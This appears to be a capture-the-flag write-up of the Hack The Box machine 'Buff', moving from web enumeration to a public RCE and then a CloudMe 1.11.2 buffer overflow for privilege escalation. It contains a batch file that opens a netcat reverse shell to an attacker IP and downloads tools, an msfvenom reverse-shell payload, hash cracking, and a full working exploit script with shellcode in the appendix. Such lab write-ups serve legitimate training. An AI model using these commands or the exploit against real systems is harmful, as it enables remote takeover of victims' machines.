Buff

Personal Rating: Hard

sudo nmap -sV <IP>

PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut
Running (JUST GUESSING): Microsoft Windows XP (85%)

Port 8080 shows this page:

This can be seen at ‘Contact’:

mrb3n's Bro Hut

Made using Gym Management Software 1.0

There are some obvious webpages and the backend appears to be php based.

/index.php
/packages.php
/facilities.php
/about.php
/contact.php
/include/process_login.php

The pages are php, so if I don't find anything else, I might scan for php parameters.

For sign in, a POST to /include/process_login.php is made with this data for test@aua.com : test

email=test%40aua.com&password=&p=ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff

The password is sent in encoded format as it seems.

A basic webdir bruteforce revealed even more pages:

feroxbuster -u http://10.10.10.198:8080/ -x php

<SNIP>
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/include/ 
[####################] - 79m    30000/30000   6/s     http://10.10.10.198:8080/upload/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/boot/js/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/img/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/profile/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/profile/upload/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/Include/ 
[####################] - 81m    30000/30000   6/s     http://10.10.10.198:8080/Profile/ 
[####################] - 81m    30000/30000   6/s     http://10.10.10.198:8080/INCLUDE/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/Profile/upload/ 
[####################] - 81m    30000/30000   6/s     http://10.10.10.198:8080/Img/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/profile/UPLOAD/ 
[####################] - 80m    30000/30000   6/s     http://10.10.10.198:8080/att/ 
[####################] - 78m    30000/30000   6/s     http://10.10.10.198:8080/boot/ 
[####################] - 76m    30000/30000   7/s     http://10.10.10.198:8080/boot/CSS/ 
[####################] - 76m    30000/30000   7/s     http://10.10.10.198:8080/boot/CSS/images/ 
[####################] - 75m    30000/30000   7/s     http://10.10.10.198:8080/boot/CSS/Images/ 
[####################] - 75m    30000/30000   7/s     http://10.10.10.198:8080/boot/JS/ 
[####################] - 60m    30000/30000   8/s     http://10.10.10.198:8080/boot/JS/Plugins/

“Gym Management System 1.0” actually seems to exist and this looks promising:

LogoGym Management System 1.0 - Unauthenticated Remote Code ExecutionExploit Database

RCE

There was an unauthenticated RCE that I could find online on ExploitDB and with searchsploit. But these PoCs were Python2 and I found a Python3 version:

Persistence

evil.bat:

@echo off
c:\Users\shaun\nc64.exe 10.10.16.6 4444 -e cmd.exe
powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.16.6:8000/evil.bat','evil.bat')
powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.16.6:8000/nc64.exe','nc64.exe')

./evil.bat

Internal Enumeration

There is an unusual folder “UNP” in Program Files. But it does not seem interesting

There is a file Tasks.bat in C:\Users\shaun\Documents with these contents:

START C:/xampp/xampp_start.exe

The user we got is not in interesting groups:

PS C:\xampp> net user shaun

net user shaun
User name shaun
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 16/06/2020 14:08:08
Password expires Never
Password changeable 16/06/2020 14:08:08
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 16/06/2020 21:38:46
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.

I got winPEASx64 on the host and ran it.

wget http://10.10.16.6:8000/winPEASx64.exe -OutFile winpeas.exe

.\winpeas.exe

I collected the systeminfo command output to search for vulnerabilities:

winpeas found the NetNTLMv2 Hash of shaun

shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000

cracking it with hashcat, the password is empty.

hashcat -a 0 -m 5600 'shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000' /usr/share/seclists/Passwords/rockyou.txt

It seems like unauthenticated users can create files and write data to C:\windows\tasks and C:\windows\system32\tasks

shaun has full access to C:\Users\shaun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Also, path injections seem to be possible for many Session Manager DLLs.

There were no interesting existing scheduled tasks:

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

I tried to create a scheduled task, but that did not work due to lack of permissions

schtasks /Create /RU "SYSTEM" /SC MINUTE /MO 1 /TN "SchedPE" /TR "cmd /c C:\Users\shaun\Documents\privesc.bat"

xampp 7.4.6 seems to be in use.

The server is listening on several ports, but only 8080 and 7460 are accessible from outside

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6044
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7460
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2120

Port 7460 seems to be unassigned, so I am not sure what runs on it.

I could not place a simple meterpreter shell on the host because it was blocked by defender.

I found the interesting file C:\users\shaun\downloads\CloudMe_1112.exe

CloudME Bof

searchsploit cloudme

CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py

Using netstat -ano I could determine that the port 8888 is listening locally, which is the port for the cloudme service. Since it it listening only locally, I esablished a socks reverse proxy:

ATTACKER: ./chisel server -p 9050 --reverse

TARGET: .\chisel.exe client 10.10.16.6:9050 R:socks

I tried to use this exploit PoC using proxychains over the tunnel, but it says that the port could not be connected to.

LogoGitHub - T0thM/CloudMe_1.11.2_Buffer_Overflow_POC_Win10_x64: HacktheBox StuffsGitHub

I might create a reverse shell shellcode with msfvenom, put it in the exploitdb PoC and try that one with Python2 (pyenv).

LogoCloudMe 1.11.2 - Buffer Overflow (PoC)Exploit Database

I finally made it work with this (modified) exploit script: *see appendix

Prerequisites:

msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.10.16.6 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

  • Put that in the python exploit

Exploitation:

  1. Attackhost terminal 0: ./chisel server -p 9050 --reverse

  2. Target terminal 0: .\chisel.exe client 10.10.16.6:9050 R:socks

  3. Attackhost terminal 1: msf6 exploit(multi/handler) > run

  4. Attackhost terminal 2: proxychains python2.7 PoC_exploit_Win10_x64.py

An interesting takeaway for me was the EXITFUNC=thread feature. The default is ‘process’, but the user has no permissions to deal with processes and I think that was the issue at first. When it worked I also used a reverse shell instead of a bind shell. But I think both could have worked. It was also a good practise to generate a custom shellcode for the existing PoC, for which I additionally had to fix some simple Python code errors.

Appendix: Python bof Exploit

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-07-21
# Exploit Author: MTOTH
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x64 (build 1909 and 1809)
# This version has been forked from the original PoC: https://www.exploit-db.com/exploits/46218
#Instructions:
# Start the CloudMe service and run the script.

import socket
import sys
import struct

target = "127.0.0.1"

padding1   = b"A" * 1052
EIP        = struct.pack("<L", 0x68f7a81b) # 0x68f7a81b : jmp esp | {PAGE_EXECUTE_WRITECOPY} [Qt5Core.dll] ASLR: False, Rebase: False, SafeSEH: False
NOP = b"\x90" * 20

# The payload provided in this PoC opens the Display Settings.
# msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.10.16.6 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

buf =  b""
buf += b"\xda\xd9\xd9\x74\x24\xf4\x5a\xb8\x25\x84\x12\xad"
buf += b"\x2b\xc9\xb1\x52\x31\x42\x17\x03\x42\x17\x83\xcf"
buf += b"\x78\xf0\x58\xf3\x69\x77\xa2\x0b\x6a\x18\x2a\xee"
buf += b"\x5b\x18\x48\x7b\xcb\xa8\x1a\x29\xe0\x43\x4e\xd9"
buf += b"\x73\x21\x47\xee\x34\x8c\xb1\xc1\xc5\xbd\x82\x40"
buf += b"\x46\xbc\xd6\xa2\x77\x0f\x2b\xa3\xb0\x72\xc6\xf1"
buf += b"\x69\xf8\x75\xe5\x1e\xb4\x45\x8e\x6d\x58\xce\x73"
buf += b"\x25\x5b\xff\x22\x3d\x02\xdf\xc5\x92\x3e\x56\xdd"
buf += b"\xf7\x7b\x20\x56\xc3\xf0\xb3\xbe\x1d\xf8\x18\xff"
buf += b"\x91\x0b\x60\x38\x15\xf4\x17\x30\x65\x89\x2f\x87"
buf += b"\x17\x55\xa5\x13\xbf\x1e\x1d\xff\x41\xf2\xf8\x74"
buf += b"\x4d\xbf\x8f\xd2\x52\x3e\x43\x69\x6e\xcb\x62\xbd"
buf += b"\xe6\x8f\x40\x19\xa2\x54\xe8\x38\x0e\x3a\x15\x5a"
buf += b"\xf1\xe3\xb3\x11\x1c\xf7\xc9\x78\x49\x34\xe0\x82"
buf += b"\x89\x52\x73\xf1\xbb\xfd\x2f\x9d\xf7\x76\xf6\x5a"
buf += b"\xf7\xac\x4e\xf4\x06\x4f\xaf\xdd\xcc\x1b\xff\x75"
buf += b"\xe4\x23\x94\x85\x09\xf6\x3b\xd5\xa5\xa9\xfb\x85"
buf += b"\x05\x1a\x94\xcf\x89\x45\x84\xf0\x43\xee\x2f\x0b"
buf += b"\x04\x1b\xba\x03\xd2\x73\xb8\x23\xc0\x89\x35\xc5"
buf += b"\x9e\x9d\x13\x5e\x37\x07\x3e\x14\xa6\xc8\x94\x51"
buf += b"\xe8\x43\x1b\xa6\xa7\xa3\x56\xb4\x50\x44\x2d\xe6"
buf += b"\xf7\x5b\x9b\x8e\x94\xce\x40\x4e\xd2\xf2\xde\x19"
buf += b"\xb3\xc5\x16\xcf\x29\x7f\x81\xed\xb3\x19\xea\xb5"
buf += b"\x6f\xda\xf5\x34\xfd\x66\xd2\x26\x3b\x66\x5e\x12"
buf += b"\x93\x31\x08\xcc\x55\xe8\xfa\xa6\x0f\x47\x55\x2e"
buf += b"\xc9\xab\x66\x28\xd6\xe1\x10\xd4\x67\x5c\x65\xeb"
buf += b"\x48\x08\x61\x94\xb4\xa8\x8e\x4f\x7d\xc8\x6c\x45"
buf += b"\x88\x61\x29\x0c\x31\xec\xca\xfb\x76\x09\x49\x09"
buf += b"\x07\xee\x51\x78\x02\xaa\xd5\x91\x7e\xa3\xb3\x95"
buf += b"\x2d\xc4\x91"

padding2 = b"D" * (2000 - len(padding1 + EIP + b"\x90" * 20 + buf))

payload = padding1 + EIP + NOP + buf + padding2  

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(payload)
        print(" [+] Payload with {} bytes sent!".format(len(payload)))
except Exception as e:
        print("Something bad happened. The error code was: {}".format(sys.exc_value))
PreviousBounty HunterNextCap

Last updated